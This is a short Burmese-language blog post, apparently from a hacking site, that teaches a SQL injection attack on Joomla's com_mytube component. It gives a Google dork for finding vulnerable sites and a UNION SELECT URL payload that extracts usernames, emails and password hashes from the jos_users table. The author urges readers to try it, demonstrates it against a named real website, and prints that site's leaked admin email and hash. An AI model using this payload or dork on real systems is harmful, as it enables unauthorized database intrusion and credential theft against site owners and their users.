Joomla Sql Injection

ဒါကနည္းေပာာင္းေလးပါ မေန ့က စမ္းေတာ့ ဆုိဒ္ေတာ္ေတာ္မ်ားမ်ားက်န္ပါေသးတယ္ဒါေၾကာင့္ တင္ေပးလုိက္ခ်င္းျဖစ္ပါတယ္ စမ္းၾကည့္ၾကပါအုံး..
Google dork: inurl:"option=com_mytube"

 

 http://site.com/index.php?option=com_mytube&Itemid=88..

ကိုကြ်န္ေတာ္

တို ့က ေနာက္ကေန injection code ထပ္ထုိးပါမယ္..

http://site.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11

,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22

,23,24,25+from+jos_users+where+id=62--

အဲ့လို ကုဒ္မ်ဳိးေပ့ါ

ဥပမာ -အေနနဲ ့ေတာ့..  

http://www.thiseas-taekwondo.gr//index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,

concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,

20,21,22,23,24,25+from+jos_users+where+id=62--

ပာိုက္ရွားလပတ္ ဘာေတြပါလိမ့္..

:admin:info@sipon.de:a4a64578bf5f2935e6f2efcfc167f41f:$1$961d6f25$

ဆိုဘဲဗ်ာ.. (ဘာေတြသိကိုမသိဘူးေနာ္)

 

 

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com